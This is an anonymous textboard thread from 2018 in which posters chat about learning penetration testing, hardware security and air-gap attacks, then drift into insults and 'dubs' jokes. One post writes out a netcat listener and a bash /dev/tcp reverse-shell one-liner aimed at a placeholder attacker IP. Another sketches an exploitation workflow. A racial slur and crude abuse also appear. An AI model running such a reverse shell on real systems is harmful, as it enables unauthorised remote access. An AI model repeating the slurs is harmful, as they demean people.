Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon.

Pages: 1-4041-

Abelson Stole The Precious Course

Name: Anonymous 2018-11-01 12:13

Name: Anonymous 2018-11-01 17:56

日本語を理解していると、ビデオを見るのが耳障りになります。

Name: Anonymous 2018-11-01 18:06

>>2
weeaboo detected

Name: Anonymous 2018-11-01 19:27

Back to 2013, please

Name: Anonymous 2018-11-01 20:03

>>4
I wish I could go back
not just to 2013, but maybe like 2005ish

Name: Anonymous 2018-11-01 21:02

I wish I could go back to my first night of learning how to code (with htdp, good book), when I brought my new laptop with Win Vista and my asshole friend made fun of me and told me to use linux.

Name: Anonymous 2018-11-01 21:02

What would you do if every day was the same and nothing you did mattered?

Name: Story of My Life 2018-11-02 2:28

>>7
nothing you did mattered?

Try to enjoy each day as it comes.

Name: Anonymous 2018-11-02 4:32

I enjoy learning about malware and hacking

Name: Anonymous 2018-11-03 1:07

...

Name: Anonymous 2018-11-04 4:18

>>9
What are your favorite topics? What exploits are you playing with?
Any CV?

Name: Anonymous 2018-11-04 4:25

>>11
I'm still learning, but I'm really into web security at the moment, but I've been doing random labs to learn about all sorts of shit.

I like file inclusion and directory traversal and file upload vulnerabilities because then it's easy to spawn an unprivileged reverse shell after running a netcat listener in a Kali VM and then find out the kernel version to then do some sort of privilege escalation stuff like dirtycow.

But I'll often just do enumeration and nmap service scanning to find the versions of software running on a lab (I only do legal labs, I'm not a malicious hacker) and then use searchsploit/exploit-db to find payloads. It's fun to read over the source code of exploits and then you can change them yourself. Some are even intentionally wrong to stop skiddies, and also some require configuration.

Right now I am stuck on a lab that has a buffer overflow vulnerability and there's a python script available for it on exploit-db, but it crashes the server when I run it, so I need to change it somehow.

But aside from hacking, finding publicly available devices is also interesting, like on shodan or even google dorking. Lots of security cameras, printers, things like that. Sometimes with no login required at all. Hell, there are even lots of Amazon S3 buckets that are public. Or on GitHub, people upload API tokens because they couldn't be bothered to put them in a separate config file and then use their .gitignore so it wouldn't get uploaded to their public repository.

I've also been playing around with metasploit, but it's honestly not that fun or interesting because all you do is load modules and then use the exploit command. You often just set rhost and rport and lhost and shit like that but it feels too abstracted away from the security concepts. I think it's more fun to compile an exploit or run a python script that you have to read over and configure instead of just loading some metasploit module and then it does all the heavy lifting for you, so to speak.

In summary, I'm all over the place but security is really fascinating.

What about you? Edited on 04/11/2018 04:30.

Name: Anonymous 2018-11-04 4:45

>web security
We never had this conversation.
>What about you?
Thank god I asked, so I don't have to waste my time:
Embedded Engineer, Operating Systems designer for Real Time applications.

My worries are nearly academic at this point, I can't think how to secure networked devices whatsoever. I'm at a point of quitting everything and becoming a monk instead.

Name: Anonymous 2018-11-04 17:33

>>13
I can't think how to secure networked devices whatsoever.
Why? It's easy to pick up. It's so much fun to get a reverse shell and then run a privilege escalation exploit to get root or NT Authority\System.

Name: Anonymous 2018-11-04 19:41

>>14
Your feeble knowledge is at script kiddy level. I'm in the "if BROP can be executed to buffer, they can temporarily side channel the CISC for memory address mapping, and side step our hardware defaults, rendering the NIC hostile"

Name: Anonymous 2018-11-05 7:29

>>15
So either you're a bot trained on Joanna's blog, or you're having a stroke. Got it.

Name: Anonymous 2018-11-05 7:47

>>15
tfw to intelligent

script kiddy level is what people usually start with, and skids often have more of a hacker mentality than jaded anuses with 20 years infosec experience who never felt the primal urge to deface a website with goatse.

I used to be just like >>14 and now I look for vulnerabilities in the kernel. keep on learning and never let your're are self become the anus

Name: Anonymous 2018-11-05 9:55

>>17
Not everybody is a virtual nigger.

Name: Anonymous 2018-11-05 12:03

>>18
and not everybody is an anus

Name: Anonymous 2018-11-05 14:27

Reverse shell? Oh? Like ssh?

Name: Anonymous 2018-11-05 15:07

>>15
bbrrrrrrrrrrrrrrrrooooppppppppppp quite pungent indeed

Name: Anonymous 2018-11-05 15:53

>>17
I'll give it to you straight:
Do you trust your hardware?

Just keep thinking about it.

Name: Anonymous 2018-11-05 19:11

>>15
I guess digital artists are script kiddies because they used photoshop instead of writing their own image editing software

I guess programmers are script kiddies because they used an IDE and compiler instead of writing their own

I guess authors are script kiddies because they use microsoft word instead of writing their own document editing program

I use industry standard security tools in addition to writing some of my own, I guess I'm a script kiddie

that's why I've done a lot of bug bounty programs

super script kiddie here

shut the fuck up, retard

Name: Anonymous 2018-11-05 19:21

>>20
no, not ssh
set up a netcat listener, like so:
nc -nvlp 1853

then, on the victim machine you have code execution on, run something like this:
bash -i >& /dev/tcp/YOUR_IP/1853 0>&1

Name: Anonymous 2018-11-05 23:15

>>23
Did a nerve got stuck?
Waiting on answer: >>22

Name: Anonymous 2018-11-06 7:14

>>22
>>17 here, I'm not >>23. as for hardware, I don't. I think hardware verification in general is going to be one of the next hig things, but I also feel their're are going to do it the wrong way - they'll focus on side-channel bugs and tamper prevention, but not on auditable open-source hardware

Name: Anonymous 2018-11-06 7:17

>>26
open source hardware can be easily copied by the chinese, who will sell it for cheaper than american companies

Name: Anonymous 2018-11-06 7:24

>>27
newsflash: proprietary hardware is also usually manufactured in China. also, I'm not an American so why would I care about profitability of American companies?

Name: Anonymous 2018-11-06 8:43

>>26
Never confused your ternary sympathizer.

Good. If you can't trust your NIC, what's the point of a web server than you can bypass all security measures through?
NSA's Shadowbrokers' leak, or Kaspery' Equation Group descriptions is what I deal with every day: how do we keep the "bad" guys out?

I have no time to play with an HTTPd designed to fail.

Name: Anonymous 2018-11-06 8:45

>>29
If you can't trust your NIC, what's the point of a web server than you can bypass all security measures through?
different attack scenarios. even if I can't keep spies out, I can keep criminals out. I can't get perfect security, but I can get 'good enough'

Name: Anonymous 2018-11-06 9:02

>>30
M8, if you have firmware access, you can readapt the output to clients: Server shows files are untouched, but your compromised NIC is sending altered messages to the client.
We've seen this in action with airgapped machines!
https://www.wired.com/story/air-gap-researcher-mordechai-guri/amp
https://en.wikipedia.org/wiki/Air_gap_malware
https://thehackernews.com/thn/2018/03/air-gap-computer-hacking.html
https://thehackernews.com/2016/02/hacking-air-gapped-computer.html

Name: Anonymous 2018-11-06 9:08

Pineapple routers come to mind. They were an amazing experience@DEFCON

Name: Anonymous 2018-11-06 9:11

securely verify my dubs

Name: Anonymous 2018-11-06 9:43

>>33
Checked with an immutable distributed blockchain; nice!

Name: Anonymous 2018-11-06 17:59

>>32
defcon is full of 40-something dudes who still dress and act like they're 20

yikes

Name: Anonymous 2018-11-06 19:03

>>35
Sounds like the whole floss/infosec scene actually.

Name: Anonymous 2018-11-06 19:05

>>36
yeah and it's embarrassing

Name: Anonymous 2018-11-06 19:14

>>35,37
What, you want to be the next girlyboy we sodomize in the parties?

Name: Anonymous 2018-11-06 19:26

>>35
its really sad
how many more defcons will actually happen... probably less than ten

Name: Anonymous 2018-11-07 7:20

I'd rather deal with boomers in denial than with javashit hipster soyboys

Name: Anonymous 2018-11-07 7:46

>>40
a lot of those boomers are javashit hipster soyboys

Name: Anonymous 2018-11-07 7:54

>>41
why can't they be fat misanthropic neckbeards like they were 10 years ago?

Name: Anonymous 2018-11-07 8:07

>>42
a rising tide of xenoestrogen lifts even the saddest inflatable dinghy

Name: Anonymous 2018-11-07 8:09

a rising tide of dubs lifts even the saddest thread

Name: Mala Sardonikon 2018-11-07 11:52

>>44
a rising tide of dubs lifts even the saddest thread

All these "dubs" jokes are getting extremely clever here.

Name: Anonymous 2018-11-07 17:02

>>44
Sounds like a line out of Undertale
A rising tide of dubs lifts fills you with DETERMINATION.

Name: Anonymous 2018-11-07 18:23

>>46
Fuck off with your cloased source games. Just fuck off all the way back to reddit.

Name: Anonymous 2018-11-08 7:25

>>47
wow, the anus is angry today

Name: Anonymous 2018-11-08 11:31

>>48
Not the anus but yes I am angry.

Name: Anonymous 2018-11-08 12:03

>>49
your're are an anus

Name: Anonymous 2018-11-08 12:10

>>50
No no I am not the anus, I am another poster.

Name: Anonymous 2018-11-08 12:13

>>51
if you think there is only one anus then your're are also an anus. if your're are angry like an anus, your're are an anus too

Name: Anonymous 2018-11-08 12:17

>>52
You are mistaken I am not the anus. Yes I was angry but I am not angry any more. If I was the anus I would have shat all over the place with angry anusries.

Name: Anonymous 2018-11-08 12:24

>>53
so you were the anus but your're are not an anus anymore. the fact that you outgrew your're are anusness gives me hope for the future of /prague/. we can exterminate or reform anuses, we can avenge the hamster, we can #include "void.h"!

Name: Anonymous 2018-11-08 12:25

we can check dubs

Don't change these.
Name: Email:
Entire Thread Thread List